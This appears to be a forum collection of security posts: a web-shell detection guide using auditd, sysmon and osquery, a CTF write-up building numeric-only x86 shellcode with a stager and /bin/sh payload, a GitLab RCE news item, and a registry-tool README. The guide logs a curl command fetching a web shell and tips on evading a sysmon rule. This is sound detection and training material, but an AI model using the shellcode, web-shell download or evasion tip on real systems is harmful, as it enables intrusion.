-w /var/www/html -p wa -k www_changes

And you can search for all writes or updates to files in /var/www/html using the filter tags: www_changes or key="www_changes". The raw auditd logs look like this:

type=SYSCALL msg=audit(1637597150.454:10650): arch=c000003e syscall=257 success=yes exit=4 a0=ffffff9c a1=556e6969fbc0 a2=241 a3=1b6 items=2 ppid=12962 pid=13086 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=11 comm="curl" exe="/usr/bin/curl" subj==unconfined key="www_changes",
type=PATH msg=audit(1637597150.454:10650): item=0 name="/var/www/html" inode=526638 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00 nametype=PARENT cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0,
type=PATH msg=audit(1637597150.454:10650): item=1 name="backdoor_shell.php" inode=527243 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00 nametype=CREATE cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0,
type=PROCTITLE msg=audit(1637597150.454:10650): proctitle=6375726C0068747470733A2F2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A6F686E54726F6F6E792F7068702D7765627368656C6C732F6D61737465722F436F6C6C656374696F6E2F5048505F5368656C6C2E706870002D6F006261636B646F6F725F7368656C6C2E706870

This allows us to note:
- euid=0, the effective UID of the action
- exe="/usr/bin/curl", the command that was run
- name="/var/www/html" ... name="backdoor_shell.php", the output file
- key="www_changes", the key of the auditd alert that was fired
- proctitle=63757..., the hex-encoded title of the process, which is our original curl command

Notes on file integrity monitoring for detecting web shells

There are other ways to check. For example, if there is version control (like git), you can compare the current state with a known good state and investigate the differences. However, if there are folders where we expect specific files to be written and modified often, such as upload directories, then file integrity monitoring might not be fully effective. We might have to fine-tune this alert and try to exclude these upload directories to reduce noise, but then how would you detect web shells uploaded within the upload directory? We need to look for more effective means of detecting web shells.

1.4 Detection: Looking for command execution for www-data using auditd

When we run webservers such as nginx, the service will run under the user www-data. In regular operations, we should not expect to see that user running commands such as whoami or ls. However, if there was a web shell, these are some of the commands we are most likely to see. Therefore, we should try to use auditd to detect these. Here is an auditd rule that will look for execve syscalls by www-data (euid=33), tagged as detect_execve_www:

-a always,exit -F arch=b64 -F euid=33 -S execve -k detect_execve_www
-a always,exit -F arch=b32 -F euid=33 -S execve -k detect_execve_www

We run the following commands on our web shell: whoami, id, pwd, ls -alh. We get the following logs from auditd as parsed by auditbeat.
Here is an example of a raw auditd log for whoami:

type=SYSCALL msg=audit(1637597946.536:10913): arch=c000003e syscall=59 success=yes exit=0 a0=7fb62eb89519 a1=7ffd0906fa70 a2=555f6f1d7f50 a3=1 items=2 ppid=7182 pid=13281 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 comm="sh" exe="/usr/bin/dash" subj==unconfined key="detect_execve_www",
type=EXECVE msg=audit(1637597946.536:10913): argc=3 a0="sh" a1="-c" a2="whoami",
type=PATH msg=audit(1637597946.536:10913): item=0 name="/bin/sh" inode=709 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0,
type=PATH msg=audit(1637597946.536:10913): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1449 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0,
type=PROCTITLE msg=audit(1637597946.536:10913): proctitle=7368002D630077686F616D69

This allows us to note:
- euid=33, uid=33, which is www-data
- comm="sh" exe="/usr/bin/dash", the shell
- argc=3 a0="sh" a1="-c" a2="whoami", the commands run on the shell
- key="detect_execve_www", the key of the auditd alert that was fired

Note regarding detect_execve_www

Let's say you decide to use the default rules found in https://github.com/Neo23x0/auditd/blob/master/audit.rules. If you try to use ready-made detection rules such as those that come with sigma, then you might try lnx_auditd_web_rce.yml. If you use this query with the rules from Neo23x0, then you will fail to detect any web shells. This is because the detection rule is:

detection:
    selection:
        type: 'SYSCALL'
        syscall: 'execve'
        key: 'detect_execve_www'
    condition: selection

Notice that this filters for the key detect_execve_www, but this exact key is not defined anywhere in Neo23x0's audit.rules! This is why you should always test your configurations and see if they detect the known bad. In Neo23x0's rules, the closest things you might get are commented out by default:

## Suspicious shells
#-w /bin/ash -p x -k susp_shell
#-w /bin/bash -p x -k susp_shell
#-w /bin/csh -p x -k susp_shell
#-w /bin/dash -p x -k susp_shell
#-w /bin/busybox -p x -k susp_shell
#-w /bin/ksh -p x -k susp_shell
#-w /bin/fish -p x -k susp_shell
#-w /bin/tcsh -p x -k susp_shell
#-w /bin/tclsh -p x -k susp_shell
#-w /bin/zsh -p x -k susp_shell

In this case, our web shell used /bin/dash because it is the default shell used by /bin/sh in the current VM I tested this on. So the relevant rule would be:

-w /bin/dash -p x -k susp_shell

But this relies on the usage of /bin/dash, and if the web shell is able to use other shells, then this specific alert will fail. Test your auditd rules on specific scenarios to ensure that they work as expected. For more information on how to write rules for auditd see:
- https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-defining_audit_rules_and_controls
- https://www.redhat.com/sysadmin/configure-linux-auditing-auditd

1.5 Detection: Looking for command execution for www-data using sysmon

MSTIC-Sysmon has two rules for this, found individually: T1505.003 and T1059.004. In them we can see:
- Process creation using /bin/bash, /bin/dash, or /bin/sh
- Process creation where the parent process is dash, nginx, or similar, and the current command is one of whoami, ifconfig, /usr/bin/ip, etc.
If we run whoami in the setup we have, the first rule that will be triggered would be T1059.004,TechniqueName=Command and Scripting Interpreter: Unix Shell, because of the order of the rules.

<Event>
  <System>
    <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
    <EventID>1</EventID>
    <Version>5</Version>
    <Channel>Linux-Sysmon/Operational</Channel>
    <Computer>sysmon-test</Computer>
    <Security UserId="0"/>
  </System>
  <EventData>
    <Data Name="RuleName">TechniqueID=T1059.004,TechniqueName=Command and Scriptin</Data>
    <Data Name="UtcTime">2021-11-23 14:06:07.116</Data>
    <Data Name="ProcessGuid">{717481a5-f54f-619c-2d4e-bd5574550000}</Data>
    <Data Name="ProcessId">11662</Data>
    <Data Name="Image">/usr/bin/dash</Data>
    <Data Name="FileVersion">-</Data>
    <Data Name="Description">-</Data>
    <Data Name="Product">-</Data>
    <Data Name="Company">-</Data>
    <Data Name="OriginalFileName">-</Data>
    <Data Name="CommandLine">sh -c whoami</Data>
    <Data Name="CurrentDirectory">/var/www/html</Data>
    <Data Name="User">www-data</Data>
    <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data>
    <Data Name="LogonId">33</Data>
    <Data Name="TerminalSessionId">4294967295</Data>
    <Data Name="IntegrityLevel">no level</Data>
    <Data Name="Hashes">-</Data>
    <Data Name="ParentProcessGuid">{00000000-0000-0000-0000-000000000000}</Data>
    <Data Name="ParentProcessId">10242</Data>
    <Data Name="ParentImage">-</Data>
    <Data Name="ParentCommandLine">-</Data>
    <Data Name="ParentUser">-</Data>
  </EventData>
</Event>

Here we see /bin/dash being executed, which is why the rule was triggered. Afterwards, the rule T1505.003,TechniqueName=Server Software Component: Web Shell is triggered because of whoami. Here is the log for it; I've removed some fields for brevity.

<Event>
  <System>
    <Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/>
    <EventID>1</EventID>
  </System>
  <EventData>
    <Data Name="RuleName">TechniqueID=T1505.003,TechniqueName=Serv</Data>
    <Data Name="UtcTime">2021-11-23 14:06:07.118</Data>
    <Data Name="ProcessGuid">{717481a5-f54f-619c-c944-fd0292550000}</Data>
    <Data Name="ProcessId">11663</Data>
    <Data Name="Image">/usr/bin/whoami</Data>
    <Data Name="CommandLine">whoami</Data>
    <Data Name="CurrentDirectory">/var/www/html</Data>
    <Data Name="User">www-data</Data>
    <Data Name="LogonGuid">{717481a5-0000-0000-2100-000000000000}</Data>
    <Data Name="LogonId">33</Data>
    <Data Name="ParentProcessId">11662</Data>
    <Data Name="ParentImage">/usr/bin/dash</Data>
    <Data Name="ParentCommandLine">sh</Data>
    <Data Name="ParentUser">www-data</Data>
  </EventData>
</Event>

Now with this knowledge, we can bypass the T1505.003 sysmon rule by running system("/bin/bash whoami"), so that the parent image of the whoami command would not be dash. This would trigger two T1059.004 alerts.
Just for an exercise, if we want to replicate our detect_execve_www in sysmon, we can use the following rule:

<RuleGroup name="" groupRelation="or">
  <ProcessCreate onmatch="include">
    <Rule name="detect_shell_www" groupRelation="and">
      <User condition="is">www-data</User>
      <Image condition="contains any">/bin/bash;/bin/dash;/bin/sh;whoami</Image>
    </Rule>
  </ProcessCreate>
</RuleGroup>

And if we want to do basic file integrity monitoring with sysmon we can use:

<FileCreate onmatch="include">
  <Rule name="change_www" groupRelation="or">
    <TargetFilename condition="begin with">/var/www/html</TargetFilename>
  </Rule>
</FileCreate>

For more information about writing your own sysmon rules you can look at:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#configuration-files
- https://techcommunity.microsoft.com/t5/sysinternals-blog/sysmon-the-rules-about-rules/ba-p/733649
- https://github.com/SwiftOnSecurity/sysmon-config/blob/master/sysmonconfig-export.xml
- https://github.com/microsoft/MSTIC-Sysmon

1.6 Hunting for web shells using osquery

For osquery, we might not be able to "find" the web shells themselves, but we might be able to find evidence of the web shell. If an attacker uses a web shell, it is possible they will try to establish a reverse shell. If so, we should see an outbound connection from the web server to the attacker.

SELECT pid, remote_address, local_port, remote_port, s.state, p.name, p.cmdline, p.uid, username
FROM process_open_sockets AS s
JOIN processes AS p USING(pid)
JOIN users USING(uid)
WHERE s.state = 'ESTABLISHED' OR s.state = 'LISTEN';

This looks for processes with sockets that have established connections or a listening port.

+-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+
| pid   | remote_address  | local_port | remote_port | state       | name            | cmdline                                | uid  | username |
+-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+
| 14209 | 0.0.0.0         | 22         | 0           | LISTEN      | sshd            | /usr/sbin/sshd -D                      | 0    | root     |
| 468   | 0.0.0.0         | 80         | 0           | LISTEN      | nginx           | nginx: worker process                  | 33   | www-data |
| 461   | 74.125.200.95   | 51434      | 443         | ESTABLISHED | google_guest_ag | /usr/bin/google_guest_agent            | 0    | root     |
| 8563  | 10.0.0.13       | 39670      | 9200        | ESTABLISHED | auditbeat       | /usr/share/auditbeat/bin/auditbeat ... | 0    | root     |
| 17770 | 6.7.8.9         | 22         | 20901       | ESTABLISHED | sshd            | sshd: user@pts/0                       | 1000 | user     |
| 17776 | 1.2.3.4         | 51998      | 1337        | ESTABLISHED | bash            | bash                                   | 33   | www-data |
+-------+-----------------+------------+-------------+-------------+-----------------+----------------------------------------+------+----------+

Notice that we see exposed port 22 and port 80, which is normal. We see outbound connections for some binaries used by GCP (my VM is hosted in GCP) as well as the auditbeat service that ships my logs to the SIEM. We also see an active SSH connection from 6.7.8.9, which might be normal. What should catch your eye is the connection with pid=17776: an outbound connection to port 1337, running a shell as www-data! This is probably an active reverse shell!

What's next

We've discussed the basics of monitoring and logging with sysmon, osquery, auditd and auditbeat, and we have used the case study of how to detect the creation and usage of web shells. In the next blog post we will go through account creation and manipulation.
Appendix

A00 Setup nginx and php

If you want to try this out on your own VM, you first need to set up an nginx server that is configured to use php. (We follow this guide). You need to install nginx and php:

sudo apt-get update
sudo apt-get install nginx
sudo apt-get install php-fpm
sudo vi /etc/php/7.3/fpm/php.ini
# cgi.fix_pathinfo=0
sudo systemctl restart php7.3-fpm
sudo vi /etc/nginx/sites-available/default
# configure nginx to use php, see next codeblock
sudo systemctl restart nginx

The nginx config might look something like this:

server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.3-fpm.sock;
    }
}

Now you should have a web server listening on port 80 that can run php code. Any file that ends with .php will be run as php code.

A01 Setup sysmon for linux

For sysmon for Linux, I was on Debian 10, so based on https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md:

wget -qO- https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.asc.gpg
sudo mv microsoft.asc.gpg /etc/apt/trusted.gpg.d/
wget -q https://packages.microsoft.com/config/debian/10/prod.list
sudo mv prod.list /etc/apt/sources.list.d/microsoft-prod.list
sudo chown root:root /etc/apt/trusted.gpg.d/microsoft.asc.gpg
sudo chown root:root /etc/apt/sources.list.d/microsoft-prod.list
sudo apt-get update
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt-get install sysmonforlinux

I used microsoft/MSTIC-Sysmon:

git clone https://github.com/microsoft/MSTIC-Sysmon.git
cd MSTIC-Sysmon/linux/configs
sudo sysmon -accepteula -i main.xml
# if you are experimenting and want to see all sysmon logs use
# sudo sysmon -accepteula -i main.xml

Logs should now be available in /var/log/syslog. If you want to add rules to main.xml, you can modify it, reload the config, and restart sysmon:

sudo sysmon -c main.xml
sudo systemctl restart sysmon

A02 Setup auditbeats and auditd for linux

Note: Setting up a local elasticsearch cluster is out of scope for this blog post. Elastic has good documentation for auditbeat: https://www.elastic.co/guide/en/beats/auditbeat/7.15/auditbeat-installation-configuration.html

curl -L -O https://artifacts.elastic.co/downloads/beats/auditbeat/auditbeat-7.15.2-amd64.deb
sudo dpkg -i auditbeat-7.15.2-amd64.deb

Modify /etc/auditbeat/auditbeat.yml and add the config for elasticsearch:

output.elasticsearch:
  hosts: ["10.10.10.10:9200"]
  username: "auditbeat_internal"
  password: "YOUR_PASSWORD"

To configure auditd rules, validate the location of the audit_rule_files:

# ...
- module: auditd
  audit_rule_files: [ '${path.config}/audit.rules.d/*.conf' ]
  audit_rules: |
    ## Define audit rules
# ...

In this case it is in /etc/auditbeat/audit.rules.d/, and I add audit-rules.conf from https://github.com/Neo23x0/auditd/blob/master/audit.rules. For some of the custom rules I make, I add them in /etc/auditbeat/audit.rules.d/custom.conf.

Other sources:
- https://www.bleepingcomputer.com/news/microsoft/microsoft-releases-linux-version-of-the-windows-sysmon-tool/
- https://github.com/elastic/integrations/issues/1930

Photo by Brook Anderson on Unsplash

Pepe Berba
Cloud Security at Thinking Machines | GMON, CCSK | Ex-Machine Learning Researcher and Ex-SOC Engineer

Source: https://pberba.github.io/security/2021/11/22/linux-threat-hunting-for-persistence-sysmon-auditd-webshell/
    1 point
  4. Numeric Shellcode

Jan 12, 2021 - 10 minutes read

Introduction

In December 2020 I competed in Deloitte's Hackazon CTF competition. Over the course of 14 days they released multiple troves of challenges in various difficulties. One of the final challenges to be released was called numerous presents. This task immediately piqued my interest as it was tagged with the category pwn. The challenge description reads:

600 POINTS - NUMEROUS PRESENTS
You deserve a lot of presents!
Note: The binary is running on a Ubuntu 20.04 container with ASLR enabled. It is x86 compiled with the flags mentioned in the C file. You can assume that the buffer for your shellcode will be in eax.
Tip: use hardware breakpoints for debugging shellcode.

Challenge code

The challenge is distributed as a .c file with no accompanying reference binary. Personally I'm not a big fan of this approach; the devil is in the details when it comes to binary exploitation. But let's have a look:

#include <stdio.h>

// gcc -no-pie -z execstack -m32 -o presents presents.c

unsigned char presents[123456] __attribute__ ((aligned (0x20000)));

int main(void) {
    setbuf(stdout, NULL);
    puts("How many presents do you want?");
    printf("> ");
    scanf("%123456[0-9]", presents);
    puts("Loading up your presents..!");
    ((void(*)())presents)();
}

Alright, at least the invocation for gcc is embedded as a comment, and the challenge code itself is brief and straightforward. There is a static uninitialized buffer presents that resides in the .bss of the program. The libc routine scanf is used to fill this buffer and jump to it. There is one catch though: the format string used here is %123456[0-9]. This uses the %[ specifier to restrict the allowed input to only the ASCII literals for the numbers 0 through 9 (0x30-0x39).

So essentially they are asking us to write a numeric-only shellcode for x86 (not amd64). Is this even possible? There is plenty of supporting evidence to be found that this is possible when restricted to alpha-numeric characters, but what about numeric-only? Long story short: yes, it is definitely possible. In the remaining part of the article I will explain the approach I took. Unfortunately, this is not a fully universal or unconstrained approach, but it is good enough™ for this particular scenario.

Diving in

If we set up a clean Ubuntu 20.04 VM, apt install build-essential and build the provided source, we end up with a binary which has the presents global variable located at 0x08080000. Examining the disassembly listing of main we can see the function pointer invocation looks like this:

mov eax, 0x8080000
call eax

So indeed, like the challenge description suggested, EAX contains a pointer to our input/shellcode. So what kind of (useful) instructions can we generate with just 0x30-0x39? Instead of staring at instruction reference manuals and handy tables for too long, I opted to brute-force generate valid opcode permutations and disassemble+dedup them (a small sketch of this step follows the list below).

Exclusive ORdinary Instructions

There were no easy instructions to do flow control with numerics only, let alone a lot of the arithmetic. There was no way to use the stack (push/pop) as some kind of scratchpad memory, as is often seen with alphanumeric shellcoding. Let's look at some obviously useful candidates though... they are all xor operations.

34 xx          -> xor al, imm8
30 30          -> xor byte ptr [eax], dh
32 30          -> xor dh, byte ptr [eax]
32 38          -> xor bh, byte ptr [eax]
35 xx xx xx xx -> xor eax, imm32

Of course, any immediate operands have to be in the 0x30-0x39 range as well.
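Here is a minimal sketch of that brute-force step, assuming the capstone Python bindings are available (pip install capstone); it enumerates every 2-byte combination of the allowed characters and prints whatever decodes into a single complete instruction:

from itertools import product
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

NUMERIC = bytes(range(0x30, 0x3a))   # ASCII '0'..'9'
md = Cs(CS_ARCH_X86, CS_MODE_32)

seen = set()
for a, b in product(NUMERIC, repeat=2):
    code = bytes([a, b])
    insns = list(md.disasm(code, 0))
    # keep only byte pairs that decode into exactly one 2-byte instruction
    if len(insns) == 1 and insns[0].size == 2:
        text = f"{insns[0].mnemonic} {insns[0].op_str}"
        if text not in seen:
            seen.add(text)
            print(code.hex(), "->", text)

Bumping repeat= up (and handling the longer imm8/imm32 encodings) surfaces essentially the xor instructions listed above.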
But these instructions provide a nice starting point. xor byte ptr [eax], dh can be used to (self-)modify code/data if we manage to point eax at the code/data we want to modify. Changing eax arbitrarily is a bit tricky, but with the help of xor eax, imm32 and xor al, imm8 we can create quite a few usable addresses. (More on this in a bit.) Writing numeric-only shellcode is all about expanding your arsenal of primitives in a way that eventually yields the desired end result. If we want to start mutating opcodes/instructions using the xor [eax], dh primitive, we need to have a useful value in dh first.

Bootstrapping

If we look at the register contents of ebx and edx in the context of this particular challenge, we see that ebx points to the start of the .got.plt section (0x0804c000) and edx is clobbered with the value 0xffffffff at the time the trampoline instruction (call eax) to our shellcode is executed. In short, bh = 0xc0 and dh = 0xff. If we start our journey like this:

xor byte ptr [eax], dh    ; *(u8*)(eax) ^= 0xff (== 0xcf)
xor dh, byte ptr [eax]    ; dh ^= 0xcf (== 0x30)
xor bh, byte ptr [eax]    ; bh ^= 0xcf (== 0x0f)

We end up with some (what I would call) useful values in both dh and bh. What exactly makes 0x30 and 0x0f useful though? Well, for one, by xor'ing numeric code with 0x30 we can now (relatively) easily introduce the values 0x00-0x09.

To be able to arbitrarily carve certain bytes in memory I picked a method that relies on basic add arithmetic. add byte ptr [eax], dh and add byte ptr [eax], bh are almost numeric-only; they start with a 0x00 opcode byte though. But this value can now be carved by xor'ing with dh, which contains 0x30. Here it becomes useful that we have a value in dh which only has bits set in the upper nibble, and a value in bh which only has bits set in the lower nibble. By combining a (reasonable!) amount of add arithmetic using bh and dh as increment values, we can carve any value we want (a small scripted version of this search is sketched a little further down). So let's say we want to produce the value 0xCD (CD 80 happens to be a useful sequence of bytes when writing x86/Linux shellcode ;-)):

start value = 0x31
0x31 + (0x30 * 2) = 0x91
0x91 + (0x0f * 4) = 0xcd

As you can see, with a total of 6 add operations (2 with dh and 4 with bh) we can easily construct the value 0xCD if we start with a numeric value of 0x31. It is fine if we overflow; we are only working with 8-bit registers.

Pages and overall structure

Having the ability to turn numeric bytes into arbitrary bytes is a useful capability, but it heavily relies on being able to control eax to pick which memory locations are being altered. Let's think about our eax-changing capabilities for a bit. We have the xor eax, imm32 and xor al, imm8 instructions at our disposal. Of course, the supplied operands to these instructions need to be in the numeric range. By chaining two xor eax, imm32 operations it becomes possible to set a few nibbles in EAX to arbitrary values, while not breaking the numeric-only rule for the operands. By adding an optional xor al, 0x30 to the end we can toggle the upper nibble of the least significant byte of eax to 0x30. This gives us a nice range of easily selectable addresses.
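Before looking at a concrete address-selection example, here is the promised sketch of the add-based byte carving: a small Python helper that, given the dh/bh values produced by the bootstrap (0x30 and 0x0f), searches for how many adds of each are needed to turn a numeric start byte into a target byte. The helper name and search bound are illustrative; the author's numeric_gen.py does this kind of bookkeeping for real.

DH, BH = 0x30, 0x0f   # values carved into dh/bh by the bootstrap above

def carve(start, target, max_ops=40):
    """Return (adds_of_dh, adds_of_bh) so that start + n*DH + m*BH == target (mod 256)."""
    for n in range(max_ops):
        for m in range(max_ops):
            if (start + n * DH + m * BH) & 0xff == target:
                return n, m
    return None

# Example from the text: turning 0x31 into 0xcd
print(carve(0x31, 0xcd))   # -> (2, 4): two adds of dh and four adds of bh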
A quick example of this address selection would look something like this:

; eax = 0x08080000, our starting address
xor eax, 0x30303130    ; eax = 0x38383130
xor eax, 0x30303030    ; eax = 0x08080100
xor al, 0x30           ; eax = 0x08080130

Let's treat the lower 16 bits of eax as our selectable address space: we have the ability to select addresses of the form 0x08080xyz, where x and z can be anything between 0 and f and y can be either 3 or 0. In essence, we can easily increase/decrease eax with a granularity of 0x100, and within each 0x100-sized page (from here on, page) we can select addresses 00-0f and 30-3f.

I came up with a structure for the shellcode where each page starts with code that patches code in the same page at offset 0x30 and higher, and the code at offset 0x30 and higher in the page then patches the final shellcode. Indeed, we're using self-modifying code that needs to be self-modified before it can self-modify (yo dawg). Roughly, the layout of our pages looks like this:

000: setup code
100: page_patcher_code_0 (patches shellcode_patcher_code_0)
130: shellcode_patcher_code_0 (patches shellcode)
200: page_patcher_code_1 (patches shellcode_patcher_code_1)
230: shellcode_patcher_code_1 (patches shellcode)
...
f00: shellcode that gets modified back into original form

This means we can have a maximum of 14 patch pages (we lose page 0 to setup code), which doesn't allow us to use very big shellcodes. However, as it turns out, this is enough for a read(stdin, buffer, size) syscall, which was good enough to beat this challenge and (in general) is enough for staging a larger shellcode.

Padding

With our limited addressing there's quite a bit of 'dead' space we can't easily address for modifying. We'll have to find some numeric-only nop operation so we can slide over these areas. Most of our numeric instructions are exactly 2 bytes, except for xor eax, imm32, which is 5 bytes. The xor eax, imm32 is always used in pairs though, so our numeric code size is always evenly divisible by 2. This means we can use a 2-byte nop instruction and not run into any alignment issues. I picked cmp byte ptr [eax], dh (38 30) as my NOP instruction, as eax always points to a mapped address and the side effects are minimal. Another option would've been the aaa instruction (37), which is exactly 1 byte in size, but it clobbers al in some cases, so I avoided it.

Putting it all together

Initially, while I was developing this method, I manually put together these self-modifying numeric-only contraptions (well, with some help from GNU assembler macros), which works but is quite a painful and error-prone process. Eventually I implemented all the details in an easy to use python script, numeric_gen.py. This tool takes care of finding the right xor masks for address selection, and of calculating the optimal amount of mutation instructions for generating the shellcode. Do note, this tool was written for the challenge I was facing. You'll want to modify the three constants (EDX, EBX, EAX) at the top if you plan to reuse my exact tooling.

Popping a shell

So we'll write a quick stager shellcode that is compact enough to be num-only-ified. It will use the read syscall to read the next stage of shellcode from stdin. We'll put the destination buffer right after the stager itself, so there's no need for trailing nop instructions or control-flow diversion. The careful reader will notice I'm not setting edx (which contains the size argument for the read syscall) here, since it's already set to a big enough value.
bits 32

global _start

_start:
    mov ecx, eax    ; ecx = eax
    add ecx, 0xd    ; ecx = &_end
    xor ebx, ebx    ; stdin
    xor eax, eax
    xor al, 3       ; eax = NR_read
    int 0x80
_end:

That should do the trick. Time to run it through the tool and give it a shot.

$ nasm -o stager.bin stager.asm
$ xxd stager.bin
00000000: 89c1 83c1 0d31 db31 c034 03cd 80         .....1.1.4...
$ python3 numeric_gen.py stager.bin stager_num.bin
[~] total patch pages: 14
[>] wrote numeric shellcode to 'stager_num.bin'
[~] old length: 13 bytes, new length 3853 (size increase 29638.46%)
$ xxd stager_num.bin
00000000: 3030 3230 3238 3530 3030 3035 3031 3030  0020285000050100
00000010: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000020: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000030: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
...
00000ee0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000ef0: 3830 3830 3830 3830 3830 3830 3830 3830  8080808080808080
00000f00: 3931 3531 3231 3031 3034 3431 32         9151210104412
$ xxd binsh.bin
00000000: 31c0 89c2 5068 6e2f 7368 682f 2f62 6989  1...Phn/shh//bi.
00000010: e389 c1b0 0b52 5153 89e1 cd80            .....RQS....
$ (cat stager_num.bin; sleep 1; cat binsh.bin; cat -) | ./presents
How many presents do you want?
> Loading up your presents..!
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
echo w00t
w00t
^C

Success! As you can see, our final numeric shellcode weighs in at 3853 bytes: a little under 4KiB, and well within the allowed limit of 123456 characters.

Closing words

I hope you enjoyed this article, and I'm eager to hear what improvements others can come up with. Right now this is not a fully generic approach, and I have no personal ambitions to turn it into one either. Things like shellcode encoding are mostly a fun party trick anyway these days.

– blasty

Sursa: https://haxx.in/posts/numeric-shellcode/
    1 point
  5. A now-patched critical remote code execution (RCE) vulnerability in GitLab's web interface has been detected as actively exploited in the wild, cybersecurity researchers warn, rendering a large number of internet-facing GitLab instances susceptible to attacks.

Tracked as CVE-2021-22205, the issue relates to improper validation of user-provided images that results in arbitrary code execution. The vulnerability, which affects all versions starting from 11.9, has since been addressed by GitLab on April 14, 2021 in versions 13.8.8, 13.9.6, and 13.10.3.

In one of the real-world attacks detailed by HN Security last month, two user accounts with admin privileges were registered on a publicly accessible GitLab server belonging to an unnamed customer by exploiting the aforementioned flaw to upload a malicious payload "image," leading to remote execution of commands that granted the rogue accounts elevated permissions.

Although the flaw was initially deemed a case of authenticated RCE and assigned a CVSS score of 9.9, the severity rating was revised to 10.0 on September 21, 2021 owing to the fact that it can be triggered by unauthenticated threat actors as well. "Despite the tiny move in CVSS score, a change from authenticated to unauthenticated has big implications for defenders," cybersecurity firm Rapid7 said in an alert published Monday.

Despite the public availability of the patches for more than six months, of the 60,000 internet-facing GitLab installations, only 21% of the instances are said to be fully patched against the issue, with another 50% still vulnerable to RCE attacks. In light of the unauthenticated nature of this vulnerability, exploitation activity is expected to increase, making it critical that GitLab users update to the latest version as soon as possible.

"In addition, ideally, GitLab should not be an internet facing service," the researchers said. "If you need to access your GitLab from the internet, consider placing it behind a VPN." Additional technical analysis related to the vulnerability can be accessed here.

Source: https://thehackernews.com/2021/11/alert-hackers-exploiting-gitlab.html
    1 point
  6. Registry Explorer

Replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include:

- Show real Registry (not just the standard one)
- Sort list view by any column
- Key icons for hives, inaccessible keys, and links
- Key details: last write time and number of keys/values
- Displays MUI and REG_EXPAND_SZ expanded values
- Full search (Find All / Ctrl+Shift+F)
- Enhanced hex editor for binary values
- Undo/redo
- Copy/paste of keys/values
- Optionally replace RegEdit
- more to come!

Build instructions

Build the solution file with Visual Studio 2022 preview. It can be built with Visual Studio 2019 as well (change the toolset to v142).

Sursa: https://github.com/zodiacon/RegExp
    1 point